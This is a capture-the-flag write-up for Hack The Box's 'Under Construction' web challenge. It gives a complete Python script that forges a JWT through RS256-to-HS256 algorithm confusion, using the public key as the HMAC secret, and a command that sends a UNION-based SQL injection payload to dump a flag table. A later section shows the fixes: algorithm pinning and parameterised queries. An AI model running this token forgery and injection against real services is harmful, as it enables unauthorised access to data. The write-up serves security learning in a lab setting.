HackTheBox Under Construction Writeup

Explore the basics of cybersecurity in the Under Construction Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/111

Description

A company that specialises in web development is creating a new site that is currently under construction. Can you obtain the flag?

Exploitation

#!/usr/bin/python3
import base64, hashlib, hmac, json, sys
import requests

def b64url_decode(segment):
    # JWT segments are base64url with the '=' padding stripped; restore it
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

def gen_token(token, payload):
    header_b64, data_b64 = token.split(".")[:2]
    header = json.loads(b64url_decode(header_b64))
    data = json.loads(b64url_decode(data_b64))
    # Switch the header to HS256 and put the payload in the username claim
    header['alg'] = "HS256"
    data['username'] = payload
    # The public key carried in the 'pk' claim is used as the HMAC secret
    public_key = data['pk'].encode("UTF-8")
    header = b64url_encode(json.dumps(header).encode('utf-8'))
    data = b64url_encode(json.dumps(data).encode('utf-8'))
    jwt_header_data = header + "." + data
    mess = jwt_header_data.encode("UTF-8")
    signature = hmac.new(public_key, mess, hashlib.sha256).digest()
    return jwt_header_data + "." + b64url_encode(signature)

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} <token> <host> <payload>")
    sys.exit(1)

token_new = gen_token(sys.argv[1], sys.argv[3])
rq = requests.get(sys.argv[2], cookies={"session": token_new}, allow_redirects=False)
rp = rq.content
# Print the response from the hard-coded offset 1778 up to the first <br>
print(str(rp)[1778:int(str(rp).index('<br>'))])

Register, log in, copy the token, and then run the script.

python poc eyJhbGciO.... http://94.237.50.242:59187/ "' union select 1,top_secret_flaag,3 FROM flag_storage--"

Summary

The Under Construction Challenge on Hack The Box is a medium-level challenge focused on JWT manipulation and SQL injection. Participants are tasked with modifying a JWT token to inject a custom payload, revealing the flag through a web request. The challenge emphasizes understanding token structure, encryption reversal, and exploiting vulnerabilities like SQL injection, offering hands-on experience in web security and encryption techniques.
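The two fixes that break this chain, as an added example that is not part of the original post or the challenge's code: pin the token algorithm before any verification, and bind the username claim as a query parameter. The `users` table layout, the expected algorithm `RS256`, the flag placeholder and the sample tokens are assumptions constructed for the demo; signature verification itself is not shown.

```python
import base64, json, sqlite3

def header_alg(token):
    """Return the 'alg' value from a JWT header (no signature check)."""
    seg = token.split(".")[0]
    seg += "=" * (-len(seg) % 4)          # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(seg)).get("alg")

def alg_is_pinned(token, expected="RS256"):
    """Reject tokens whose header asks for any algorithm but the expected one."""
    try:
        return header_alg(token) == expected
    except (ValueError, AttributeError):   # bad base64, bad JSON, non-object header
        return False

def make_db():
    # Constructed schema: only flag_storage/top_secret_flaag come from the page
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE flag_storage(top_secret_flaag TEXT);
        INSERT INTO users VALUES (1, 'alice', 'x');
        INSERT INTO flag_storage VALUES ('FLAG_PLACEHOLDER');
    """)
    return db

def lookup_concat(db, username):
    # Vulnerable pattern: the claim value is spliced into the SQL text
    return db.execute(f"SELECT * FROM users WHERE username = '{username}'").fetchall()

def lookup_param(db, username):
    # Hardened: the value is bound as a parameter and never parsed as SQL
    return db.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()

def b64(obj):
    # Helper used only to build the constructed sample tokens
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

PAYLOAD = "' union select 1,top_secret_flaag,3 FROM flag_storage--"
FORGED = b64({"alg": "HS256", "typ": "JWT"}) + "." + b64({"username": PAYLOAD}) + ".sig"

if __name__ == "__main__":
    db = make_db()
    print("algorithm accepted:", alg_is_pinned(FORGED))
    print("concatenated query:", lookup_concat(db, PAYLOAD))
    print("parameterised query:", lookup_param(db, PAYLOAD))
```

Either control alone stops the request shown above: the forged token fails the algorithm check, and the bound parameter turns the payload into a username that matches no row.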

This post is licensed under CC BY 4.0 by the author.